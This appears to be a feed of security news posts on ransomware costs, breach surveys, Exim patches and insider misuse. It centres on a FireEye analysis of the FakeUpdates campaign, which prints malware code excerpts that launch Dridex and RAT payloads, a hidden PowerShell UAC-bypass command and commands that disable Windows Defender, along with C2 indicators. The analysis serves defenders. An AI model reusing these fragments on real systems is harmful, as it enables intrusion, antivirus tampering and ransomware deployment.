The research also found that 90% of UK businesses said threat hunting has improved their defenses, and McElroy noted that there is less reliance on alerting, and this has had a positive impact, “but where do you find the threat hunters as this is a skill that has not been around for long and globally there is a massive shortage of threat hunters and incident responders.”

Danish Firm Says Costs of Apparent Ransomware Attack Could Reach $95M

A Danish company revealed that the costs associated with what appears to be a ransomware attack could reach as much as $95 million. Demant, a Danish manufacturer of hearing aids, suffered a “critical incident” that affected its IT infrastructure on 3 September. The company’s IT team responded by shutting down multiple systems across multiple locations […]… Read More

The post Danish Firm Says Costs of Apparent Ransomware Attack Could Reach $95M appeared first on The State of Security.

Vulnerability in Cisco Webex and Zoom may expose online meetings to snooping

Cequence Security’s CQ Prime Threat Research Team discovered of a vulnerability in Cisco Webex and Zoom video conferencing platforms that potentially allows an attacker to enumerate or list and view active meetings that are not protected. The web conferencing market includes nearly three dozen vendors, some of whom may use similar meeting identification techniques. Although the CQ Prime team did not test each of these products, it is possible they could be susceptible as well. … More

The post Vulnerability in Cisco Webex and Zoom may expose online meetings to snooping appeared first on Help Net Security.

Hearing Aid Giant Warns of $95m in Ransomware Losses

Hearing Aid Giant Warns of $95m in Ransomware Losses

A Danish firm has revealed that a suspected ransomware attack on its IT systems last month may end up costing as much as $95m.

Demant, which is one of the world’s leading makers of hearing aids, said it experienced a “critical incident” on September 3. Although it refuses to clarify the nature of the incident, local reports were less circumspect.

Although the firm had backed up data, the sheer scale of the attack appears to have had a major impact on its recovery.

“The Group’s IT infrastructure was hit by cybercrime. Our quick response to the issue by shutting down IT systems across multiple sites and business units contained and limited the issue, but key business processes throughout the value chain were nevertheless impacted by the incident, including R&D, production and distribution,” Demant admitted in an update late last week.

“We continue ramping up to accommodate the back-log built up since the incident, to rebuild necessary inventories across the supply chain and to reduce turnaround times of repair and custom-made hearing aids. We are still in the recovery and ramp-up phase at our amplifier production site in Denmark and at our cochlear implants production site in France.”

The cumulative effect of these outages will have a negative financial impact on the firm in the region of DKK 550-650m ($80-95m). This includes a DKK 100 ($15m) deduction thanks to the firm’s cyber insurance policy.

Demant expects DKK 50m ($7m) to be incurred due to direct losses.

The firm’s hearing wholesale business was particularly badly affected, accounting for around half of estimated lost sales.

“The incident has prevented us from executing our ambitious growth activities in some of the most important months of the year – particularly in the US, which is our biggest market,” it continued.

“Despite our efforts to operate the business in the best possible way, our immediate focus on supporting existing customers to prevent them from being impacted by the incident has impacted sales and will likely impact our organic growth rate throughout the rest of the year.”

The news is another cautionary tale for firms currently unprepared to deal with the ransomware epidemic that continues to spread across the globe. Norwegian aluminium giant Norsk Hydro was hit earlier this year, leading to losses in the tens of millions of dollars.

Head Fake: Tackling Disruptive Ransomware Attacks

Within the past several months, FireEye has observed financially-motivated threat actors employ tactics that focus on disrupting business processes by deploying ransomware in mass throughout a victim’s environment. Understanding that normal business processes are critical to organizational success, these ransomware campaigns have been accompanied with multi-million dollar ransom amounts. In this post, we’ll provide a technical examination of one recent campaign that stems back to a technique that we initially reported on in April 2018.

Between May and September 2019, FireEye responded to multiple incidents involving a financially-motivated threat actor who leveraged compromised web infrastructure to establish an initial foothold in victim environments. This activity bared consistencies with a fake browser update campaign first identified in April 2018 – now tracked by FireEye as FakeUpdates. In this newer campaign, the threat actors leveraged victim systems to deploy malware such as Dridex or NetSupport, and multiple post-exploitation frameworks. The threat actors’ ultimate goal in some cases was to ransom systems in mass with BitPaymer or DoppelPaymer ransomware (see Figure 1).


Figure 1: Recent FakeUpdates infection chain

Due to campaign proliferation, we have responded to this activity at both Managed Defense customers and incident response investigations performed by Mandiant. Through Managed Defense network and host monitoring as well as Mandiant’s incident response findings, we observed the routes the threat actor took, the extent of the breaches, and exposure of their various toolkits.

Knock, Knock: FakeUpdates are Back!

In April 2018, FireEye identified a campaign that used compromised websites to deliver heavily obfuscated Trojan droppers masquerading as Chrome, Internet Explorer, Opera, and/or Firefox browser updates. The compromised sites contained code injected directly into the HTML or in JavaScript components rendered by the pages which had been injected. These sites were accessed by victim users either via HTTP redirects or watering-hole techniques utilized by the attackers.

Since our April 2018 blog post, this campaign has been refined to include new techniques and the use of post-exploitation toolkits. Recent investigations have shown threat actor activity that included internal reconnaissance, credential harvesting, privilege escalation, lateral movement, and ransomware deployment in enterprise networks. FireEye has identified that a large number of the compromised sites serving up the first stage of FakeUpdates have been older, vulnerable Content Management System (CMS) applications.

You Are Using an Older Version…of our Malware

The FakeUpdates campaign begins with a rather intricate sequence of browser validation, performed before the final payload is downloaded. Injected code on the initial compromised page will make the user’s browser transparently navigate to a malicious website using hard-coded parameters. After victim browser information is gleaned, additional redirects are performed and the user is prompted to download a fake browser update. FireEye has observed that the browser validation sequence may have additional protections to evade sandbox detections and post-incident triage attempts on the compromise site(s).


Figure 2: Example of FakeUpdate landing page after HTTP redirects

The redirect process used numerous subdomains, with a limited number of IP addresses. The malicious subdomains are often changed in different parts of the initial redirects and browser validation stages.

After clicking the ‘Update’ button, we observed the downloading of one of three types of files:

  • Heavily-obfuscated HTML applications (.hta file extensions)
  • JavaScript files (.js file extensions)
  • ZIP-compressed JavaScript files (.zip extensions)

Figure 3 provides a snippet of JavaScript that provides the initial download functionality.

var domain = '//gnf6.ruscacademy[.]in/';
var statisticsRequest = 'wordpress/news.php?b=612626&m=ad2219689502f09c225b3ca0bfd8e333&y=206';
var statTypeParamName = 'st';

var filename = 'download.hta';
var browser = 'Chrome';
var special = '1';   
var filePlain = window.atob(file64);
var a = document.getElementById('buttonDownload');

Figure 3: Excerpts of JavaScript code identified from the FakeUpdates landing pages

When the user opens the initial FakeUpdates downloader, the Windows Scripting Host (wscript.exe) is executed and the following actions are performed:

  1. A script is executed in memory and used to fingerprint the affected system.
  2. A subsequent backdoor or banking trojan is downloaded if the system is successfully fingerprinted.
  3. A script is executed in memory which:
    • Downloads and launches a third party screenshot utility.
    • Sends the captured screenshots to an attacker.
  4. The payload delivered in step 2 is subsequently executed by the script process.

The backdoor and banking-trojan payloads described above have been identified as Dridex, NetSupport Manager RAT, AZOrult, and Chthonic malware. The strategy behind the selective payload delivery is unclear; however, the most prevalent malware delivered during this phase of the infection chain were variants of the Dridex backdoor.

FakeUpdates: More like FakeHTTP

After the end user executes the FakeUpdates download, the victim system will send a custom HTTP POST request to a hard-coded Command and Control (C2) server. The POST request, depicted in Figure 4, showed that the threat actors used a custom HTTP request for initial callback. The Age HTTP header, for example, was set to a string of 16 seemingly-random lowercase hexadecimal characters.


Figure 4: Initial HTTP communication after successful execution of the FakeUpdates dropper

The HTTP Age header typically represents the time in seconds since an object has been cached by a proxy. In this case, via analysis of the obfuscated code on disk, FireEye identified that the Age header correlates to a scripted “auth header” parameter; likely used by the C2 server to validate the request. The first HTTP POST request also contains an XOR-encoded HTTP payload variable “a=”.

The C2 server responds to the initial HTTP request with encoded JavaScript. When the code is decoded and subsequently executed, system and user information is collected using wscript.exe. The information collected from the victim system included:

  • The malicious script that initialized the callback
  • System hostname
  • Current user account
  • Active Directory domain
  • Hardware details, such as manufacturer
  • Anti-virus software details
  • Running processes

This activity is nearly identical to the steps observed in our April 2018 post, indicating only minor changes in data collection during this stage. For example, in the earlier iteration of this campaign, we did not observe the collection of the script responsible for the C2 communication. Following the system information gathering, the data is subsequently XOR-encoded and sent via another custom HTTP POST request request to the same C2 server, with the data included in the parameter “b=”. Figure 5 provides a snippet of sample of the second HTTP request.


Figure 5: Second HTTP POST request after successful system information gathering

Figure 6 provides a copy of the decoded content, showing the various data points the malware transmitted back to the C2 server.

0=500
1=C:\Users\User\AppData\Local\Temp\Chrome.js
2=AMD64
3=SYSTEM1
4=User
5=4
6=Windows_NT
7=DOMAIN
8=HP
9=HP EliteDesk
10=BIOS_VERSION
11=Windows Defender|Vendor Anti-Virus
12=Vendor Anti-Virus|Windows Defender|
13=00:00:00:00:00:00
14=Enhanced (101- or 102-key)
15=USB Input Device
16=1024x768
17=System Idle Process|System|smss.exe|csrss.exe|wininit.exe|csrss.exe| winlogon.exe|services.exe|lsass.exe|svchost.exe|svchost.exe|svchost.exe|svchost.exe|svchost.exe|
svchost.exe|spoolsv.exe|svchost.exe|svchost.exe|HPLaserJetService.exe|conhost.exe…

Figure 6: Decoded system information gathered by the FakeUpdates malware

After receiving the system information, the C2 server responds with an encoded payload delivered via chunked transfer-encoding to the infected system. This technique evades conventional IDS/IPS appliances, allowing for the second-stage payload to successfully download. During our investigations and FireEye Intelligence’s monitoring, we recovered encoded payloads that delivered one of the following:

  • Dridex (Figure 7)
  • NetSupport Manage Remote Access Tools (RATs) (Figure 8)
  • Chthonic or AZORult (Figure 9)
    function runFile() {
        var lastException = '';
        try {
            var wsh = new ActiveXObject("WScript.Shell");
            wsh.Run('cmd /C rename "' + _tempFilePathSave + '" "' + execFileName + '"');
            WScript.Sleep(3 * 1000);
            runFileResult = wsh.Run('"' + _tempFilePathExec + '"');
            lastException = '';
        } catch (error) {
            lastException = error.number;
            runFileExeption += 'error number:' + error.number + ' message:' + error.message;
        }
    }

Figure 7: Code excerpt observed in FakeUpdates used to launch Dridex payloads

    function runFile() {
        var lastException = '';
        try {
            var wsh = new ActiveXObject("WScript.Shell");
            runFileResult = wsh.Run('"' + _tempFilePathExec + '" /verysilent');
            lastException = '';
        } catch (error) {
            lastException = error.number;
            runFileExeption += 'error number:' + error.number + ' message:' + error.message;
        }
    }

Figure 8: Code excerpt observed in FakeUpdates used to launch NetSupport payloads

    function runFile() {
        var lastException = '';
        try {
            var wsh = new ActiveXObject("WScript.Shell");
            runFileResult = wsh.Run('"' + _tempFilePathExec + '"');
            lastException = '';
        } catch (error) {
            lastException = error.number;
            runFileExeption += 'error number:' + error.number + ' message:' + error.message;
        }
    }

Figure 9: Code excerpt observed in FakeUpdates used to launch Chthonic and AZORult payloads

During this process, the victim system downloads and executes nircmdc.exe, a utility specifically used during the infection process to save two system screenshots. Figure 10 provides an example command used to capture the desktop screenshots.

"C:\Users\User\AppData\Local\Temp\nircmdc.exe" savescreenshot "C:\Users\User\AppData\Local\Temp\6206a2e3dc14a3d91.png"

Figure 10: Sample command used to executed the Nircmd tool to take desktop screenshots

The PNG screenshots of the infected systems are then transferred to the C2 server, after which they are deleted from the system. Figure 11 provides an example of a HTTP POST request, again with the custom Age and User-Agent headers.


Figure 11: Screenshots of the infected system are sent to an attacker-controlled C2

Interestingly, the screenshot file transfers were neither encoded nor obfuscated, as with other data elements transferred by the FakeUpdates malware. As soon as the screenshots are transferred, nircmdc.exe is deleted.

All Hands on Deck

In certain investigations, the incident was far from over. Following the distribution of Dridex v4 binaries (botnet IDs 199 and 501), new tools and frameworks began to appear. FireEye identified the threat actors leveraged their Dridex backdoor(s) to execute the publicly-available PowerShell Empire and/or Koadic post-exploitation frameworks. Managed Defense also identified the FakeUpdates to Dridex infection chain resulting in the download and execution of PoshC2, another publicly available tool. While it could be coincidental, it is worth noting that the use of PoshC2 was first observed in early September 2019 following the announcement that Empire would no longer be maintained and could represent a shift in attacker TTPs. These additional tools were often executed between 30 minutes and 2 hours after initial Dridex download. The pace of the initial phases of related attacks possibly suggests that automated post-compromise techniques are used in part before interactive operator activity occurs.

We identified extensive usage of Empire and C2 communication to various servers during these investigations. For example, via process tracking, we identified a Dridex-injected explorer.exe executing malicious PowerShell: a clear sign of an Empire stager:


Figure 12: An example of PowerShell Empire stager execution revealed during forensic analysis

In the above example, the threat actors instructed the victim system to use the remote server 185.122.59[.]78 for command-and-control using an out-of-the-box Empire agent C2 configuration for TLS-encrypted backdoor communications.

During their hands-on post-exploitation activity, the threat actors also moved laterally via PowerShell remoting and RDP sessions. FireEye identified the use of WMI to create remote PowerShell processes, subsequently used to execute Empire stagers on domain-joined systems. In one specific case, the time delta between initial Empire backdoor and successful lateral movement was under 15 minutes. Another primary goal for the threat actor was internal reconnaissance of both the local system and domain the computer was joined to. Figure 13 provides a snippet of Active Directory reconnaissance commands issued by the attacker during one of our investigations.


Figure 13: Attacker executed commands

The threat actors used an Empire module named SessionGopher and the venerable Mimikatz to harvest endpoint session and credential information. Finally, we also identified the attackers utilized Empire’s Invoke-EventVwrBypass, a Windows bypass technique used to launch executables using eventvwr.exe, as shown in Figure 14.

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x


Figure 14: PowerShell event viewer bypass

Ransomware Attacks & Operator Tactics

Within these investigations, FireEye identified the deployment BitPaymer or DoppelPaymer ransomware. While these ransomware variants are highly similar, DoppelPaymer uses additional obfuscation techniques. It also has enhanced capabilities, including an updated network discovery mechanism and the requirement of specific command-line execution. DoppelPaymer also uses a different encryption and padding scheme.

The ransomware and additional reconnaissance tools were downloaded through public sharing website repositories such as DropMeFiles and SendSpace. Irrespective of the ransomware deployed, the attacker used the SysInternals utlity PSEXEC to distribute and execute the ransomware.  

Notably, in the DoppelPaymer incident, FireEye identified that Dridex v2 with the Botnet ID 12333 was downloaded onto the same system previously impacted by an instance of Dridex v4 with Botnet ID 501. Within days, this secondary Dridex instance was then used to enable the distribution of DoppelPaymer ransomware.  Prior to DoppelPaymer, the threat actor deleted volume shadow copies and disabled anti-virus and anti-malware protections on select systems. Event log artifacts revealed commands executed through PowerShell which were used to achieve this step (Figure 15):

Event Log

EID

Message

Microsoft-Windows-PowerShell%4Operational

600

 HostApplication=powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true

Microsoft-Windows-PowerShell%4Operational

600

 HostApplication=powershell.exe Uninstall-WindowsFeature -Name Windows-Defender

Application

1034

Windows Installer removed the product. Product Name: McAfee Agent-++-5.06.0011-++-1033-++-1603-++-McAfee, Inc.-++-(NULL)-++--++-. Product Version: 82.

Figure 15: Event log entries related to the uninstallation of AV agents and disablement of real-time monitoring

The DoppelPaymer ransomware was found in an Alternate Data Stream (ADS) in randomly named files on disk. ADSs are attributes within NTFS that allow for a file to have multiple data streams, with only the primary being visible in tools such as Windows Explorer. After ransomware execution, files are indicated as encrypted by being renamed with a “.locked” file extension. In addition to each “.locked” file, there is a ransom note with the file name “readme2unlock.txt” which provides instructions on how to decrypt files.


Figure 16: DoppelPaymer ransomware note observed observed during a Mandiant Incident Response investigation

Ransomware? Not In My House!

Over the past few years, we have seen ransomware graduate from a nuisance malware to one being used to extort victim networks out of significant sums of money. Furthermore, threat actors are now coupling ransomware with multiple toolkits or other malware families to gain stronger footholds into an environment. In this blog post alone, we witnessed a threat actor move through multiple toolsets - some automated, some manual - with the ultimate goal of holding the victim organization hostage.

Ransomware also raises the stakes for unprepared organizations as it levels the playing field for all areas of your enterprise. Ransomware proves that threat actors don’t need to get access to the most sensitive parts of your organization – they need to get access to the ones that will disrupt business processes. This widens your attack surface, but luckily, also gives you more opportunity for detection and response. Mandiant recently published an in depth white paper on Ransomware Protection and Containment Strategies, which may help organizations mitigate the risk of ransomware events.

Indicators

The following indicator set is a collective representation of artifacts identified during investigations into multiple customer compromises.

Type

Indicator(s)

FakeUpdates Files

0e470395b2de61f6d975c92dea899b4f

7503da20d1f83ec2ef2382ac13e238a8

102ae3b46ddcb3d1d947d4f56c9bf88c

aaca5e8e163503ff5fadb764433f8abb

2c444002be9847e38ec0da861f3a702b

62eaef72d9492a8c8d6112f250c7c4f2

175dcf0bd1674478fb7d82887a373174
10eefc485a42fac3b928f960a98dc451
a2ac7b9c0a049ceecc1f17022f16fdc6

FakeUpdates Domains & IP Addresses

<8-Characters>.green.mattingsolutions[.]co
<8-Characters>.www2.haciendarealhoa[.]com
<8-Characters>.user3.altcoinfan[.]com
93.95.100[.]178
130.0.233[.]178
185.243.115[.]84

gnf6.ruscacademy[.]in

backup.awarfaregaming[.]com

click.clickanalytics208[.]com

track.amishbrand[.]com

track.positiverefreshment[.]org

link.easycounter210[.]com

nircmdc.exe

8136d84d47cb62b4a4fe1f48eb64166e

Dridex

7239da273d3a3bfd8d169119670bb745

72fe19810a9089cd1ec3ac5ddda22d3f
07b0ce2dd0370392eedb0fc161c99dc7
c8bb08283e55aed151417a9ad1bc7ad9

6e05e84c7a993880409d7a0324c10e74

63d4834f453ffd63336f0851a9d4c632

0ef5c94779cd7861b5e872cd5e922311

Empire C2

185.122.59[.]78

109.94.110[.]136

Detecting the Techniques

FireEye detects this activity across our platforms, including named detections for Dridex, Empire, BitPaymer and DoppelPaymer Ransomware. As a result of these investigations, FireEye additionally deployed new indicators and signatures to Endpoint and Network Security appliances.  This table contains several specific detection names from a larger list of detections that were available prior to this activity occurring.

Platform

Signature Name

 

Endpoint Security

 

HX Exploit Detection
Empire RAT (BACKDOOR)
EVENTVWR PARENT PROCESS (METHODOLOGY)
Dridex (BACKDOOR)
Dridex A (BACKDOOR)
POWERSHELL SSL VERIFICATION DISABLE (METHODOLOGY)
SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)
FAKEUPDATES SCREENSHOT CAPTURE (METHODOLOGY)

Network Security

Backdoor.FAKEUPDATES
Trojan.Downloader.FakeUpdate
Exploit.Kit.FakeUpdate
Trojan.SSLCert.SocGholish

MITRE ATT&CK Technique Mapping

ATT&CK

Techniques

Initial Access

Drive-by Compromise (T1189), Exploit Public-Facing Application (T1190)

Execution

PowerShell (T1086), Scripting (T1064), User Execution (T1204), Windows Management Instrumentation (T1047)

Persistence

DLL Search Order Hijacking (T1038)

Privilege Escalation

Bypass User Account Control (T1088), DLL Search Order Hijacking (T1038)

Defense Evasion

Bypass User Account Control (T1088), Disabling Security Tools (T1089), DLL Search Order Hijacking (T1038), File Deletion (T1107), Masquerading (T1036), NTFS File Attributes (T1096), Obfuscated Files or Information (T1027), Scripting (T1064), Virtualization/Sandbox Evasion (T1497)

Credential Access

Credential Dumping (T1003)

Discovery

Account Discovery (T1087), Domain Trust Discovery (T1482), File and Directory Discovery (T1083), Network Share Discovery (T1135), Process Discovery (T1057), Remote System Discovery (T1018), Security Software Discovery (T1063), System Information Discovery (T1082), System Network Configuration Discovery (T1016), Virtualization/Sandbox Evasion (T1497)

Lateral Movement

Remote Desktop Protocol (T1076),  Remote File Copy (T1105)

Collection

Data from Local System (T1005), Screen Capture (T1113)

Command And Control

Commonly Used Port (T1436), Custom Command and Control Protocol (T1094) ,Data Encoding (T1132), Data Obfuscation (T1001), Remote Access Tools (T1219), Remote File Copy (T1105), Standard Application Layer Protocol (T1071)

Exfiltration

Automated Exfiltration (T1020), Exfiltration Over Command and Control Channel (T1041)

Impact

Data Encrypted for Impact (T1486), Inhibit System Recovery (T1490), Service Stop (T1489)

Acknowledgements

A huge thanks to James Wyke and Jeremy Kennelly for their analysis of this activity and support of this post.

Guess what? You should patch Exim again!

Hot on the heels of a patch for a critical RCE Exim flaw comes another one that fixes a denial of service (DoS) condition (CVE-2019-16928) that could also be exploited by attackers to pull off remote code execution. With no mitigations available at this time, Exim maintainers urge admins to upgrade to version 4.92.3, which has been released on Sunday. About Exim and the flaw (CVE-2019-16928) According to E-Soft, Exim is the most widely used … More

The post Guess what? You should patch Exim again! appeared first on Help Net Security.

Behavioral Analytics: What It Is Significant to Enterprise CyberSecurity

Do you want to know why behavioral analytics is vital to your enterprise? Are you even aware of what behavioral analytics is? What are the threats that it can detect quickly? Is your business in danger because of these threats?

As your company grows, you also need to add more assets and users to your enterprise network. Your business workflows undergo permanent changes as you add applications and databases. These upgrades mean more efficiency and collaboration that will result in more profitability. However, they also translate to more liabilities in terms of cybersecurity.

Each user, digital asset, or application can be an accessible doorway for hackers to invade your network. Also, faulty programming or malice perpetrated by any user can be a threat inside your business. In both cases, they can damage not only your network but your business processes as well.

What can you do? Monitoring every user can be frustrating and overwhelming. Even if you have the workforce, your IT security team can’t sustain the demand. Maintaining visibility on applications and users is close to impossible as your enterprise grows. Is there hope? Yes, there is!

Behavioral analytics can help solve your dilemma efficiently and magnificently. Let us take you to a thorough discussion about the topic.

The Basics of Behavioral Analytics

Behavioral Analytics analyzes patterns, activities, and trends of applications and users. It searches for any quirk or habit in your workflows. Moreover, each user has its profile in the system. For instance, your employee, Arthur, uses “Database A” four times a day. Because of next-generation technology, behavioral analytics can also notice the endpoint he uses when he requests for access. It can record and store them in a behavioral baseline.

This behavioral baseline can establish if Arthur, for example, requests for access to Database B for ten times on a specific workday. Moreover, it can determine if he makes the request thousands of miles from his usual location. Your cybersecurity perceives both behaviors that are outside of Arthur’s baseline.

Moreover, the cybersecurity can prohibit the requests for access and alert your IT security team so it can perform the necessary investigation. Arthur may be on a business trip on that day and need to access some information not relevant to his position. Your team can inform your cybersecurity about any unusual circumstances to allow Arthur to access the files.

This scenario can also demonstrate a possible hacking using Arthur’s credentials and accessing sensitive enterprise data. If this is the case, your IT security team can trigger incident response and terminate the hacking procedure to return the account to Arthur’s control. Moreover, it can fix any vulnerability that it may discover. It will also follow the same process for data traffic, movements, and requests for applications.

Behavioral analytics leverages statistical analysis and machine learning to monitor the behaviors of your users and search for anomalies.

Why Is Behavioral Analytics Critical to Cybersecurity?

Jack Vance wrote The Moon Moth. It is a famous short story in the science-fiction genre. The plot revolves around an imposter who can alter his appearance but can’t conceal his habits and tastes.

This observation is also valid for actual hackers. In a report by Centrify, a privileged access management supplier, 74% of business transgressions start with a weakened privileged account. Moreover, some studies show that at least 80% of breaches start with jeopardized accounts. It means that hackers prefer to disguise themselves using one of your users.

The damage caused by hackers can be overwhelming. In theory, these hackers can cause reputational loss and downtime, especially when they destroy your network. They can tamper your users’ baseline behaviors. They can try to cause damage, but whenever they do so, behavioral analytics can sanction the attempts and stop them. It can trigger a response from your IT team to intervene.

Moreover, this cybersecurity must-have relieve your IT security of too much burden. The group may feel overworked with threat hunting and user requests. A cybersecurity staffing crisis may occur if things get out of control. Fortunately, behavioral analytics operates automatically and helps your IT staff streamline its investigations to save time.

Deploying Business Analytics

For your organization, you must first consider your size, user base, IT infrastructure, industry, and applications. Furthermore, you must think of your future growth and scaling plans for the next five years. It must be your initial step in any selection of cybersecurity solutions. Unfortunately, many companies neglect it.

A majority of the enterprises don’t select optimal performance over speed. They choose the solution that can solve their immediate problems adequately. Because of this way of thinking, you’ll realize that your IT infrastructure has many solutions with serious integration issues.

If you want long-term solutions to your cybersecurity issues, you must consider behavioral analytics. If you’ve decided to incorporate it in your enterprise, your next step is choosing a robust Security Information and Event Management (SIEM) solution.

Why Do You Need a SIEM solution?

A SIEM solution is the next-generation version of our topic. It includes user and entity behavioral analytics (UEBA). Furthermore, you can avail of threat intelligence feeds to help you detect any modern or expanded threats quickly.

You may think that a SIEM solution is complicated. You’re right! Moreover, the system works as a tool for log management and analysis that adds a behavioral analysis layer. Cybersecurity recognizes that it can’t deflect 100% of threats because the digital perimeters can’t do it. However, with a SIEM system, you’re able to detect threats that can wreak havoc to your enterprise.

Hackers are everywhere and waiting for an opportunity to strike. If you want to monitor and stop them, you can do so with the next-generation analytics and cybersecurity capabilities. A SIEM solution with UEBA and other significant capabilities is an excellent strategy to catch these hackers. It prevents them from intruding and cause severe downtime, which can compromise your reputation to the business world.

The post Behavioral Analytics: What It Is Significant to Enterprise CyberSecurity appeared first on .

Darknet hosting provider busted in underground NATO bunker

Police overcame not only digital defenses of the "bulletproof" provider CyberBunker but also barbed wire fences and surveillance cams.

Six in 10 Global Firms Hit by a Data Breach

Six in 10 Global Firms Hit by a Data Breach

Around 60% of global organizations have suffered a breach in the past three years, with the rest increasingly feeling like their turn is coming soon, according to new research from Bitdefender.

The security firm polled over 6000 cybersecurity professionals from organizations of all sizes in the UK, US, Australia, New Zealand, Germany, France, Italy and Spain to compile its Hacked Off! study.

While six in 10 respondents said they’d been hit by a data breach, 36% claimed they could be facing one without knowing. It’s no surprise that over half (58%) are concerned about the readiness of their organization to deal with such an attack.

Board-level buy-in is a major sticking point: 57% of respondents claimed that the C-suite is the least likely to comply with corporate cybersecurity policy, putting their firm at risk and making it hard to drive the kind of company-wide security-by-design culture demanded by GDPR and other regulators.

Nearly three-quarters (73%) believe they’re more at risk as they are under-resourced, while alert fatigue is a major problem, with over half (53%) of endpoint detection and response (EDR) alerts described as false alarms.

The research found that, partly because of this EDR failure, firms are reacting too slowly to incidents.

Over a fifth (29%) claimed it would take a week or longer to detect an advanced cyber-attack, while just three in every 100 cybersecurity professionals claimed 100% of attacks can be efficiently detected and isolated.

Yet despite all of these shortcomings, more than half (57%) of respondents rated their organization’s cybersecurity “very good” or “excellent.”

Liviu Arsene, global cybersecurity researcher at Bitdefender, explained that further investments in anti-malware, network traffic analysis and EDR were all highlighted by respondents as necessary.

“Poor cybersecurity is an undeniable threat to businesses today. From the loss of customer trust to the impact on the bottom line it is critical for infosec professionals to get it right,” he added.

“According to respondents, 53% of infosec professionals have contemplated leaving their job due to under-resourcing in terms of staff. Resources are in fact such a bugbear that infosec pros say the main obstacles to their organizations’ strengthening their cybersecurity posture are a lack of budget and a lack of skilled personnel.”

What are you doing for European Cyber Security Month?

In a month where many people’s biggest concerns are pumpkin-related, you might consider putting equal effort into something more substantial. October is National Cyber Security Awareness Month, where people are encouraged to brush up on their everyday information security practices.

With an estimated 2 million cyber attacks last year costing victims £36 billion, there is a lot to be gained from tightening up the way you handle sensitive information.

What is European Cyber Security Month?

Cyber Security Month is an EU awareness campaign that promotes cyber security in the workplace and at home.

It aims to make people understand the threat of cyber crime and the way our actions help or hinder attacks.

Our shared responsibility

The theme of this year’s campaign is “cyber security is a shared responsibility”, which can be interpreted in a couple of ways.

First, it refers to the three aspects of cyber security: people, processes and technology. IT departments must implement software and other security controls to remove vulnerabilities, organisations must create processes that explain to employees how to keep information secure, and people must follow those instructions.

If anyone fails to perform their role, the chance of a data breach increases dramatically.

Cyber security is equally everybody’s responsibility in that no one is exempt from best practices. Senior employees might delegate responsibility or complain that they are too busy to follow certain processes. Similarly, some employees might assume that one person won’t make a difference and so they can cut corners when it comes to things like password management or doing work on a public Wi-Fi.

But if everyone obeys that logic, no one will be following the organisation’s processes. Cyber security best practices can certainly be inconvenient at times, but it only takes one mistake to jeopardise the entire organisation.

What else does Cyber Security Month cover?

The first two weeks cover cyber hygiene, which involves your daily routines and general behaviour when handling sensitive information.

The second half of the month is dedicated to emerging technologies and the way they protect or threaten our security.

This is one of the biggest talking points in the cyber security industry, thanks to the controversial use of biometric data.

Although fingerprints and retinal scans provide a much more secure authentication system than passwords, they also threaten people’s privacy, and breaches of such information have major repercussions.

After all, you can change a password if it’s disclosed but you can’t change your fingerprints.

How you can get involved

There are four events in the UK over the next few weeks that are aligned with European Cyber Security Month:

Technology experts will gather at this event, hosted in Newport, to highlight the threats that organisations face and how they should address their vulnerabilities.

A series of short presentations explaining the threat of cyber crime, the role of law enforcement and what we can do to protect ourselves.

The Isle of Man government’s inaugural cyber security conference features keynote speakers and networking opportunities between the public and private sectors.

This one-day event takes place in Manchester, featuring speeches on how to implement strong security measures and how technological advancements create opportunities and challenges for staying secure.

What are we doing for Cyber Security Month?

At the risk of sounding trite, every month is cyber security awareness month at IT Governance. We are committed to helping people improve their cyber security practices, through our blog, webinars, green papers, tools and services.

October is no exception. We’ll be linking to resources that can help keep you and your organisation secure, and sharing cyber security tips and stats to remind you of what you’re up against.

You wouldn’t ignore a medical expert’s advice. Why risk your cyber health?

Don’t risk it, cyber secure it this Cyber Security Month. Find out how to keep your organisation healthy with our dedicated tips.

Take a look

cyber security awareness month

The post What are you doing for European Cyber Security Month? appeared first on IT Governance Blog.

Over A Billion Malicious Ad Impressions Exploit WebKit Flaw to Target Apple Users

The infamous eGobbler hacking group that surfaced online earlier this year with massive malvertising campaigns has now been caught running a new campaign exploiting two browser vulnerabilities to show intrusive pop-up ads and forcefully redirect users to malicious websites. To be noted, hackers haven't found any way to run ads for free; instead, the modus operandi of eGobbler attackers

Hashtag Trending – WeWork pulls its IPO; Facebook testing out removing visible likes; female streamers face harassment on Twitch

WeWork pulls its IPO; Facebook testing out removing visible likes; female streamers face harassment on Twitch The chaos surrounding WeWork continues and it is trending on Google. Last week saw the exit of their CEO Adam Neumann and rumors that his inner circle will be shown the door along with thousands of other employees. And…

HMRC Disciplines 100 Staff for IT Misuse

HMRC Disciplines 100 Staff for IT Misuse

Nearly 100 HMRC employees have faced disciplinary action after misusing computer systems over the past two years, according to Parliament Street.

The think tank sent Freedom of Information (FOI) requests to the UK tax office to better understand the insider threat there.

It revealed that 92 staff members had misused IT systems over the previous two financial years, with eight sacked for their indiscretions.

Most common was misuse of email, with 15 written warnings issued in 2017-18 and a further 11 in 2018-19. According to the think tank, the culprit in many of these was a repeat offender, who had also been issued with a final written warning for computer misuse.

In 2018-19, nine written warnings were issued for misuse of social media channels, compared to zero the previous year.

In addition, 13 HMRC employees were reprimanded for misuse of telecommunications, and 19 were disciplined for misuse of computer equipment or systems.

In fact, all eight dismissals were for “misuse of computer equipment.”

Absolute Software CEO, Christy Wyatt, said tackling insider abuses should be a top priority for the public sector, especially organizations handling highly sensitive financial data on millions of citizens.

“This kind of activity often involves individuals abusing access to personal information and in some cases sharing it, leading to a potential data breach,” she added.

“Organizations like HMRC need to adopt an enterprise resilience mindset not only around potential bad employee behavior, but fortifying their overall security posture and risk management profile.”

The HMRC has been called out before for poor data protection practices. In May, privacy regulator the ICO handed it an enforcement notice after it broke the law over collection of biometric data from taxpayers.

Some 20% of cybersecurity incidents and 15% of the data breaches investigated by Verizon this year were linked to insiders, according to its Data Breach Investigations Report (DBIR).

Frequent VBA Macros used in Office Malware

The malware expert Marco Ramilli collected a small set of VBA Macros widely re-used to “weaponize” Maldoc (Malware Document) in cyber attacks.

